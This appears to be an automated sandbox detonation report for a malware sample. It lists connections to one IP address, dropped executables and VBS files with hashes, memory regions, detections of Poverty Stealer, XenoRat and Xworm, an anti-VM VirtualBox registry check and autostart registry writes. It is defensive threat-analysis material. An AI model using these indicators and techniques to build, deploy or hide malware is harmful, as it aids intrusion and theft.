| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | tcp |
Files
memory/4824-0-0x00007FFFFBD73000-0x00007FFFFBD75000-memory.dmp
memory/4824-1-0x0000000000990000-0x0000000000998000-memory.dmp
memory/4824-2-0x00007FFFFBD70000-0x00007FFFFC831000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe
| MD5 | cfbd38c30f1100b5213c9dd008b6e883 |
| SHA1 | 03da6d72c9d92bea2b2e5c4a8538f0a3628fbe73 |
| SHA256 | 25350f356b356c9ab48ebfcca67cad970d1a213f8716a1d006d339a38f0f7cc5 |
| SHA512 | a7d3bce28d0443dbe671394bd6c720f0fba28cf18ee0a5c3bfe547c3ffaebb9431ebe40749de1eb460b03696a401c167d76de99e9769e33ca62a3bf8302a5b04 |
memory/4628-13-0x00000000001E0000-0x0000000000640000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\Tq4a1Bz.exe
| MD5 | 9c433a245d7737ca7fa17490e460f14e |
| SHA1 | 31e6388f4e45a97a97ac0f34c26a9858ef8dcdb9 |
| SHA256 | 0b6604d2e6086f7322c634ab925bdc381fe720a2a12f254e5b63b42f89b680f7 |
| SHA512 | edaf8ff778db40dfcacd7c8cb5cef598dc7c13ebfb6b4f8e828c0697b24115f637ac510c945d31b1c4873d39fca7d8be7b03ba6dc64e665def6bf2d058a00c95 |
memory/2748-23-0x0000000000793000-0x0000000000794000-memory.dmp
memory/4944-24-0x0000000000400000-0x000000000040A000-memory.dmp
memory/4944-27-0x0000000000400000-0x000000000040A000-memory.dmp
memory/4944-28-0x0000000000770000-0x00000000007A2000-memory.dmp
memory/4944-29-0x0000000000400000-0x000000000040A000-memory.dmp
memory/4944-31-0x0000000000400000-0x000000000040A000-memory.dmp
memory/4628-32-0x00000000001E0000-0x0000000000640000-memory.dmp
memory/4628-33-0x00000000001E0000-0x0000000000640000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\wKQeiIr.exe
| MD5 | b73ecb016b35d5b7acb91125924525e5 |
| SHA1 | 37fe45c0a85900d869a41f996dd19949f78c4ec4 |
| SHA256 | b3982e67820abc7b41818a7236232ce6de92689b76b6f152fab9ef302528566d |
| SHA512 | 0bea9890dbcd3afd2889d0e7c0f2746995169e7b424f58d4998c50bc49d2b37d30f5bd1845d3079b25f9963af2b71f136719cbd9fda37f7b85874992096b3e1d |
memory/1992-46-0x00000000352A0000-0x00000000352B0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\fHR9z2C.exe
| MD5 | 892d97db961fa0d6481aa27c21e86a69 |
| SHA1 | 1f5b0f6c77f5f7815421444acf2bdd456da67403 |
| SHA256 | c4b11faff0239bc2d192ff6e90adec2684124336e37c617c4118e7e3bc338719 |
| SHA512 | 7fe31101f027f2352dea44b3ba4280e75a4359b6a822d813f9c50c0d6ef319b7c345280786c1bc794b45fbd4fa87939a79cc15b82fc7959ccce1b732f33ba241 |
memory/4944-55-0x0000000000400000-0x000000000040A000-memory.dmp
memory/4824-56-0x00007FFFFBD73000-0x00007FFFFBD75000-memory.dmp
memory/4824-58-0x00007FFFFBD70000-0x00007FFFFC831000-memory.dmp
memory/4628-59-0x0000000007AF0000-0x0000000007B56000-memory.dmp
memory/4628-60-0x00000000001E0000-0x0000000000640000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\6713.vbs
| MD5 | 8b4ed5c47fdddbeba260ef11cfca88c6 |
| SHA1 | 868f11f8ed78ebe871f9da182d053f349834b017 |
| SHA256 | 170226b93ac03ac3178c0429577626add00665e1d71be650a4c46674f6e262a5 |
| SHA512 | 87e5bcaa143e616c365557f5af73e131a10eb380016633b8c7e38c83b0a216a8f6768cfa0166fad208d47830808444517e57d07d850ff2bd575ca67bad9eabdf |
C:\Users\Admin\AppData\Local\Temp\4637.vbs
| MD5 | 34b33b5a437e20d03d79b62a797dfe99 |
| SHA1 | 9b57b598a7e9d66157a05a44bc7c097bf5486e6c |
| SHA256 | f920f526773c0565072fcfd250319c9dd53b9197d448b9d29307598e0fa004e1 |
| SHA512 | 757be8161af2eb4af36772e2e0d912e0967540cb42ef6ef8cd85f28edb478756c99d9e7a6fef04b16e6bf63a3dc9ddb9c2adf490e8d9ae2ca0e3e9b76ef6fa6c |
memory/4628-65-0x0000000007FA0000-0x000000000809A000-memory.dmp
memory/4628-66-0x0000000008270000-0x0000000008432000-memory.dmp
memory/4628-67-0x00000000080F0000-0x0000000008140000-memory.dmp
memory/4628-68-0x00000000081C0000-0x0000000008236000-memory.dmp
memory/4628-69-0x0000000008970000-0x0000000008E9C000-memory.dmp
memory/4628-70-0x0000000008460000-0x000000000847E000-memory.dmp
memory/4628-72-0x00000000085D0000-0x000000000866C000-memory.dmp
memory/4628-80-0x0000000008670000-0x00000000088F0000-memory.dmp
memory/4628-100-0x0000000008900000-0x000000000890C000-memory.dmp
memory/4628-102-0x0000000009690000-0x0000000009C34000-memory.dmp
memory/4628-103-0x0000000009200000-0x0000000009292000-memory.dmp
memory/4628-104-0x00000000091E0000-0x00000000091EA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7871.vbs
| MD5 | bb8cfb89bce8af7384447115a115fb23 |
| SHA1 | 6a0e728f4953128db9db52474ae5608ecee9c9c3 |
| SHA256 | d812291a41eddd5eac04972e66feffc44c1ee2c249d708bb282144823a6e8485 |
| SHA512 | d69901ba3cebd1fe8ed8e3d613e16a6cfbead827a9493a7edd8c62fb2915a550450ff4f47f00a8c66880ea10cd4029bceac4518d1951c19fb7ad9d7505007553 |
C:\Users\Admin\AppData\Local\Temp\a\filer.exe
| MD5 | 9096f57fa44b8f20eebf2008a9598eec |
| SHA1 | 42128a72a214368618f5693df45b901232f80496 |
| SHA256 | f4e2eeea7e5db511bfca33ffd1e26bce5d72e2a381e84bf3700938eb404f7934 |
| SHA512 | ad29f94040532ab78679ec9e50d58d8ccef3f99d5ab53ef7c654527b9b2634da4c44375b2ca2d54a83d1dd1e0fa9b1d1a13241ffe0328bea07740166927521b2 |
memory/3260-118-0x00000130FBE70000-0x00000130FBE92000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kicr4ce3.prz.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6d42b6da621e8df5674e26b799c8e2aa |
| SHA1 | ab3ce1327ea1eeedb987ec823d5e0cb146bafa48 |
| SHA256 | 5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c |
| SHA512 | 53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29 |
C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe
| MD5 | 73507ed37d9fa2b2468f2a7077d6c682 |
| SHA1 | f4704970cedac462951aaf7cd11060885764fe21 |
| SHA256 | c33e3295dcb32888d000a2998628e82fd5b6d5ee3d7205ea246ac6357aa2bea6 |
| SHA512 | 3a1031ce2daf62a054f41d226e9c9a0144ce746130db68737aaaa7930b148cbfbb99476c05504d6ebd4911f4e567ec1399005be7e64583caa636d7d94f5cd369 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 9e22f5f8482f42818bd01bc5d34cc09c |
| SHA1 | 78cee6c628479315068d433f2f64026cda923fab |
| SHA256 | e9bac58ebf7ebd18168720741c76ac73c8050282344582803c1f6e328cd16fd8 |
| SHA512 | a7f25d548622078deb06974248064811ef19631005fe2ccb6955c164f08fab7762b0295d6fd1807eba961af7469eeafdaf5acca4737c11727b4654348793e913 |
memory/3588-165-0x00007FF617F80000-0x00007FF6199A1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\Xworm%20V5.6.exe
| MD5 | 3273f078f87cebc3b06e9202e3902b5c |
| SHA1 | 03b1971e04c8e67a32f38446bd8bfac41825f9cc |
| SHA256 | 4b6caa8467cf7ca3d7a3d3b2ac70e48510b7c4570e4810f3305aca1ef6cdf85c |
| SHA512 | 2a0bc7bf3ffd2f2e027e0feffb803f76dd11da48335e1b66a3c1927410e0a82c6ce212901c2ace9eca5bcce51eee49a12dc4619fc31711f0770e2d55ab7730f9 |
memory/740-179-0x0000018BB4FD0000-0x0000018BB5EB8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\XClient.exe
| MD5 | ce69d13cb31832ebad71933900d35458 |
| SHA1 | e9cadfcd08d79a2624d4a5320187ae84cf6a0148 |
| SHA256 | 9effe406fd302590314a9211fda92126ea6a7721d294c93fdf755b4cdfbd0bcf |
| SHA512 | 7993e79a9aeee679c9342d36fcb7624f1e7616db59eff10ff50d00e84bbbc5d9d7c154601f8a94bed7f25888f43f6f1922b87af31a582221e9022e6a8c3b1409 |
memory/1560-191-0x0000000000FB0000-0x0000000000FBE000-memory.dmp
memory/2128-206-0x00000000352A0000-0x00000000352B0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\VBVEd6f.exe
| MD5 | 4ea576c1e8f58201fd4219a86665eaa9 |
| SHA1 | efaf3759b04ee0216254cf07095d52b110c7361f |
| SHA256 | d94206d9509cc47cae22c94d32658b31cf65c37b1b15ce035ffaa5ce5872ad2f |
| SHA512 | 0c7462bc590d06f0ead37246f189d4d56e1d62ff73f67bf7e2ce9c653d8c56812a5f1306fb504168f7e33b87485c3465ea921a36f1ba5b458d7763e45c649494 |
memory/4208-215-0x0000000000400000-0x000000000066D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\test12.exe
| MD5 | 5853f8769e95540175f58667adea98b7 |
| SHA1 | 3dcd1ad8f33b4f4a43fcb1191c66432d563e9831 |
| SHA256 | d58fee4abb20ce9214a9ed4ae8943a246a106bbe4f2b5332754c3b50ce7b0995 |
| SHA512 | c1393a51eea33279d86544c6c58b946ae909540a96edda07c19e21a24e55c51be34e45413aa5005e9aeedacbb7d38471027baa27c18dbc36a8359856da1a0d80 |
C:\Users\Admin\AppData\Local\Temp\a\test6.exe
| MD5 | 6383ec21148f0fb71b679a3abf2a3fcc |
| SHA1 | 21cc58ccc2e024fbfb88f60c45e72f364129580f |
| SHA256 | 49bf8246643079a1ec3362f85d277ce13b3f78d8886c87ee8f5a76442290adde |
| SHA512 | c6866039fc7964737cd225709930470e4efe08dc456b83b5b84d9f136c7d0734d2cce79f3b36c7c8e4b1559b2348c8fca981b2cce05f1c0b8f88ec7c7f532125 |
memory/2000-232-0x0000000000180000-0x00000000001D4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\test14.exe
| MD5 | f299d1d0700fc944d8db8e69beb06ddd |
| SHA1 | 902814ffd67308ba74d89b9cbb08716eec823ead |
| SHA256 | b105f79e0eac7079fc2998949eee28fb0bf7f9a08c4912477031ac8d7e897406 |
| SHA512 | 6821e6e9393cbd8471a0403052ac4d4df6e14dc0955deabd7709331dcf537f3076c08003001eab34788d53cf03fd61878a4b31aa7879f862627b28110f43e2ca |
memory/4076-241-0x0000000000180000-0x00000000001D4000-memory.dmp
memory/4076-242-0x0000000000D40000-0x0000000000DA1000-memory.dmp
memory/4076-243-0x0000000000180000-0x0000000000183000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\pantest.exe
| MD5 | 312f2c6630bd8d72279c8998acbbbeba |
| SHA1 | 8f11b84bec24f586a74d1c48d759ee9ec4ad9d54 |
| SHA256 | 706dccc82df58b5d49a8bcccc655a9dce0d47410bc922eb9a91108e5a1f82cfb |
| SHA512 | ed7eba574b4d6a07c582148583ed0532293366d15b5091580c6ddf9a45ed78a185163b2b713e77957cd99b03353ea8f778c8de50075b9d2924358b431fc0b37d |
memory/3628-252-0x0000000000190000-0x00000000001E4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\test9.exe
| MD5 | d399231f6b43ac031fd73874d0d3ef4d |
| SHA1 | 161b0acb5306d6b96a0eac17ba3bedb8c4a1b0f2 |
| SHA256 | 520db0cc6b1c86d163dff2797dcbc5f78b968313bedea85f7530830c87e0287f |
| SHA512 | b1d0b94b0b5bc65113a196276d0a983872885c4b59dd3473bcaa6c60f2051de4579a7bc41082a2016472a3ec7de8bcf3ac446e3f3cb27521327fe166284d3400 |
memory/4616-261-0x0000000000930000-0x0000000000984000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\test10-29.exe
| MD5 | 6b0255a17854c56c3115bd72f7fc05bd |
| SHA1 | 0c5e1dfa655bcbb3ffad8e0e4471c41255de1dd5 |
| SHA256 | ce94cf176e146813c922782ded112003e45749cb07bb7c635241c1c39e54a36a |
| SHA512 | fac0df5995a050653aa160e2e7fb8275b5c5471ce8fad9fee7c97beda37a96c27b1a3ff4de5b35e164378e3abed7df0998f6117aabb45e7eb46841e02617d1c1 |
memory/4336-270-0x0000000000180000-0x00000000001D4000-memory.dmp
memory/4336-271-0x0000000000D00000-0x0000000000D61000-memory.dmp
memory/4336-272-0x0000000000180000-0x0000000000183000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\test19.exe
| MD5 | 5a6d9e64bff4c52d04549bbbd708871a |
| SHA1 | ae93e8daf6293c222aa806e34fb3a209e202b6c7 |
| SHA256 | c2c06c7b68f9ac079a8e2dcab3a28df987613ec94dbb0b507da838de830dcaa8 |
| SHA512 | 97a2003e27257a4b4f2493b5f8e7d0d22ff539af4be3bc308fd2c3c3e0cff1bcbc222c26d8a01a1ccbf99d4c30403b464a8660dd340afe9d6d54b31651abf05a |
memory/3708-281-0x0000000000180000-0x00000000001D4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\test10.exe
| MD5 | 0f0e9f3b9a70d62ae4bc66a93b604146 |
| SHA1 | e516287a1a99aac6c296083a4545a6a6981a9352 |
| SHA256 | f38408d7e7dd4873930980fedfa841d515d3b4e12a7f33ba1d384c627186afda |
| SHA512 | 42940fc6103c07ee8d113fe46aff26d34cb53c8244bb60e1763efafb295ed7197133ef270dc0709641b8403aeee257119ed0492b0efcccf0607109f1e2112881 |
memory/2144-290-0x0000000000180000-0x00000000001D4000-memory.dmp
memory/2144-291-0x0000000000180000-0x0000000000183000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\test_again4.exe
| MD5 | b84e8b628bf7843026f4e5d8d22c3d4f |
| SHA1 | 12e1564ed9b706def7a6a37124436592e4ad0446 |
| SHA256 | b01b19c4d71f75f9ec295958a8d96a2639d995c20c133f4ffda2a2dabe8a7c28 |
| SHA512 | 080aa4ad9094f142aa0eae3ae3d4bce59d61d8b5664d397268316f3c19fa4a7c161acf522adc8da5f6413a9327915f99ecdfe568b84300a9b31e42eb625ed0cd |
memory/4768-300-0x0000000000C50000-0x0000000000CA4000-memory.dmp
memory/4768-301-0x00007FF80F300000-0x00007FF80F38D000-memory.dmp
memory/4768-303-0x00007FF80F300000-0x00007FF80F38D000-memory.dmp
memory/4768-302-0x0000000000400000-0x0000000000460000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\test23.exe
| MD5 | 956ec5b6ad16f06c92104365a015d57c |
| SHA1 | 5c80aaed35c21d448173e10b27f87e1bfe31d1eb |
| SHA256 | 8c3924e850481889d5423eb7131833b4e828bf289d3f1eb327d491cb85a30d61 |
| SHA512 | 443cd7b6763c1d9be3fbc061f015ba2298f664f70b908ae45e7db04019173a9288d6d30068300788a2bcd2aa694811094bfcb959e127fedb7da9cd042827e1d2 |
memory/2656-313-0x0000000000180000-0x00000000001D4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\test5.exe
| MD5 | c8ac43511b7c21df9d16f769b94bbb9d |
| SHA1 | 694cc5e3c446a3277539ac39694bfa2073be6308 |
| SHA256 | cb1eee26a7d2050feb980eccb69d35c05b5a0d28821972df19d974b386d9e4fe |
| SHA512 | a9c7cf19857b9600e77d14d06c3774e38c6e04d2a72d119273216cc2ab9242b583b5ce5a6829fcf1e1553865088d628c82be827d8cc322e4e97c24a5ddc04628 |
memory/3156-322-0x0000000000A30000-0x0000000000A84000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\test11.exe
| MD5 | 2340185f11edd4c5b4c250ce5b9a5612 |
| SHA1 | 5a996c5a83fd678f9e2182a4f0a1b3ec7bc33727 |
| SHA256 | 76ad6d0544c7c7942996e16fee6ef15aed4b8b75deb3c91551a64635d4455031 |
| SHA512 | 34e863e001845e8117b896f565a020e70963b19d029b5e2bba89049be5eadae1abe06859a527bf29b86008a903c3879c63d680f9d1e1d264d238869cf14f232c |
memory/2204-331-0x0000000000180000-0x00000000001D4000-memory.dmp
memory/2000-332-0x0000000000400000-0x0000000000460000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\test20.exe
| MD5 | 153a52d152897da755d90de836a35ebf |
| SHA1 | 8ba5a2d33613fbafed2bb3218cf03b9c42377c26 |
| SHA256 | 10591da797b93e3607264825685f76d6327f4463bf21953e66600abc6550b213 |
| SHA512 | 3eb53a80e68efd134945b9e770166bad2147645bef7db41f585a7a1e9c7def45ff035bd91bad87b1daef3c6833c2f17a2c0fb33183a3c9327b40ccf59be45240 |
memory/3756-341-0x0000000000930000-0x0000000000984000-memory.dmp
memory/4076-342-0x0000000000400000-0x0000000000460000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\test_again3.exe
| MD5 | e501f77ff093ce32a6e0f3f8d151ee55 |
| SHA1 | c330a4460aef5f034f147e606b5b0167fb160717 |
| SHA256 | 9e808115bf83004226accb266fcbc6891f4c5bc7364d966e6f5de4717e6d8ed1 |
| SHA512 | 845548058034136bb6204ae04efcb37c9e43187c2b357715fcfd9986614095a0fcf1e103ab8d9f566dedb34a033f9f30a346cbdf9ee2e262dd8a44d5eaf72af2 |
memory/2284-351-0x0000000000C90000-0x0000000000CE4000-memory.dmp
memory/3628-352-0x0000000000400000-0x0000000000460000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\test16.exe
| MD5 | 9f88e470f85b5916800c763a876b53f2 |
| SHA1 | 4559253e6df6a68a29eedd91751ce288e846ebc8 |
| SHA256 | 0961766103f8747172f795b6cbf3c8ef06a1ded91fe49ff0f2f280cc326d1d9a |
| SHA512 | c4fc712ed346c3c40f33f2514f556e92d915a6d0257fdd8d174b3f87f8c34a9167cfaca58785b52b68a5e5c710656a6269e5d0e20eef7f63a6d06f658d53fb5d |
memory/940-361-0x0000000000760000-0x00000000007B4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\test13.exe
| MD5 | 44c1c57c236ef57ef2aebc6cea3b3928 |
| SHA1 | e7135714eee31f96c3d469ad5589979944d7c522 |
| SHA256 | 4c3618c90ca8fac313a7868778af190a3c22c8c03132505283b213da19ce9b7f |
| SHA512 | 99d0a428082d19bb28327698e8a06f78eee5a23134f037a4357c1ac4a6c9bb7d6ad454f28a2a546e8c7770423c64d6d951a074cd40711bc1bdcd40e59919934d |
memory/4616-370-0x0000000000400000-0x0000000000460000-memory.dmp
memory/3944-371-0x0000000000180000-0x00000000001D4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\test_again2.exe
| MD5 | 52a2fc805aa8e8610249c299962139ed |
| SHA1 | ab3c1f46b749a3ef8ad56ead443e26cde775d57d |
| SHA256 | 4801ead85ca08f439f695f198f5a87032c688143b3fe679b2b0872102c0d58ea |
| SHA512 | 2e6897092f3e25da023b003975f2fa5f45a4a2a115bc56460d15b21933da517fd7e1e98dcdad49196236614a516c710c19f4bfd4603776b620eb6d9c31c02cdf |
memory/1684-380-0x0000000000C90000-0x0000000000CE4000-memory.dmp
memory/4336-381-0x0000000000400000-0x0000000000460000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\test15.exe
| MD5 | 80e217c22855e1a2d177dde387a9568f |
| SHA1 | c136d098fcd40d76334327dc30264159fd8683f8 |
| SHA256 | 0ef39ccad2c162a5ab7dc13be3bba8f898fb38ba2f7357e840bd97456537decd |
| SHA512 | 6f658863ee676a07df7bbfc7b8a60bc591a6e8bf21c6f7147772e0b9beb223310c32da7436c202a4e804ce9e32128ec360618c3b273105e0f948d72859adc686 |
memory/3260-390-0x0000000000180000-0x00000000001D4000-memory.dmp
memory/3708-391-0x0000000000400000-0x0000000000460000-memory.dmp
memory/2144-392-0x0000000000400000-0x0000000000460000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\test18.exe
| MD5 | a694c5303aa1ce8654670ff61ffda800 |
| SHA1 | 0dbc8ebd8b9dd827114203c3855db80cf40e57c0 |
| SHA256 | 994d0670d75433df8e0f2cce833d19d3045d3527143ce2ccf4cb4c04d4157a62 |
| SHA512 | b15856b54a018a71e71637e47e00b1c64154e24ae4c2a671dca25c43bccf4bbbf9da4445b6a7d48f62cab7da06c30fdd884d4bba21c5929a9569db0a288d9d9a |
memory/2368-401-0x0000000000180000-0x00000000001D4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\test21.exe
| MD5 | 3b8e201599a25cb0c463b15b8cae40a3 |
| SHA1 | 4a7ed64c4e1a52afbd21b1e30c31cb504b596710 |
| SHA256 | 407f4efed0f09c97d226da99b030bf628fcd9a2f8ee1416c1f4f1bd482d372a8 |
| SHA512 | fb5af97c3b5784ebdd3988179e970d9462aec283a41301f50f3cf31537538cef5e7534c6bb44b28ab5e1807ac85afb9490b6c30014ce9eb207030c3096921ac7 |
memory/3104-409-0x0000000000180000-0x00000000001D4000-memory.dmp
memory/2656-411-0x0000000000400000-0x0000000000460000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\test22.exe
| MD5 | e1c3d67db03d2fa62b67e6bc6038c515 |
| SHA1 | 334667884743a3f68a03c20d43c5413c5ada757c |
| SHA256 | 4ab79ee78e0abe5fff031d06a11f1de1a9e0c935097e1b829ad3e8b077700936 |
| SHA512 | 100c775bcf6ce70a82cb18884e1ca50f3cdd0be1b9f4f835e6c41c9820ff42c4fe3ca3d1fdc41d4f2e0f26dda5e5b85b3f555b88f11b58c5e81267706cafa3d7 |
memory/2980-418-0x0000000000180000-0x00000000001D4000-memory.dmp
memory/2980-419-0x00007FF80F300000-0x00007FF80F38D000-memory.dmp
memory/2980-421-0x00007FF80F300000-0x00007FF80F38D000-memory.dmp
memory/2980-420-0x0000000000400000-0x0000000000460000-memory.dmp
memory/3156-422-0x0000000000400000-0x0000000000460000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\test8.exe
| MD5 | cae51fb5013ed684a11d68d9f091e750 |
| SHA1 | 28842863733c99a13b88afeb13408632f559b190 |
| SHA256 | 67256a1f764ec403d8a1bcb009e701069b815db72869eae0b59dab1f23ebc8e8 |
| SHA512 | 492961ea16f34bafa9e8695eeffef94cc649e29d7ad9da8c02b4bc49c33878cf9d75d6cdb69f7ad6713f6e5296750bd52dc08b70cd6e6c0ad963de6ca87f0ec6 |
memory/1520-429-0x0000000000930000-0x0000000000984000-memory.dmp
memory/2204-430-0x0000000000400000-0x0000000000460000-memory.dmp
memory/1008-431-0x0000000000A30000-0x0000000000A84000-memory.dmp
memory/1008-432-0x0000000000CD0000-0x0000000000D31000-memory.dmp
memory/1008-433-0x0000000000A30000-0x0000000000A33000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\test7.exe
| MD5 | 2734a0771dc77ea25329ace845b85177 |
| SHA1 | 3108d452705ea5d29509b9ffd301e38063ca6885 |
| SHA256 | 29cfae62adef19cd2adf20e32908289270ebd3bdd52b407818b8f641bfb1314a |
| SHA512 | c400274d6682ad4dfae87fa53a272f3210262e083d6a966ce49711438b8e3a49ff0110e0d2b18007db8bbab54b8f8e4f0e18ba579a0f33b470e14324c3bc637b |
Analysis: behavioral5
Detonation Overview
Submitted
2024-11-26 22:53
Reported
2024-11-26 22:55
Platform
win7-20240903-en
Max time kernel
106s
Max time network
110s
Command Line
Signatures
Detect Poverty Stealer Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect XenoRat Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Poverty Stealer
Povertystealer family
XenorRat
Xenorat family
Xworm
Xworm family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe | N/A |
Boot or Logon Autostart Execution: Active Setup
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}\IsInstalled = "1" | C:\Windows\System32\ie4uinit.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383} | C:\Windows\System32\ie4uinit.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}\Version = "11,0,9600,0" | C:\Windows\System32\ie4uinit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}\IsInstalled = "1" | C:\Windows\System32\ie4uinit.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383} | C:\Windows\System32\ie4uinit.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383} | C:\Windows\System32\ie4uinit.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}\Locale = "*" | C:\Windows\System32\ie4uinit.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}\Version = "11,0,9600,0" | C:\Windows\System32\ie4uinit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}\IsInstalled = "1" | C:\Windows\System32\ie4uinit.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383} | C:\Windows\System32\ie4uinit.exe | N/A |
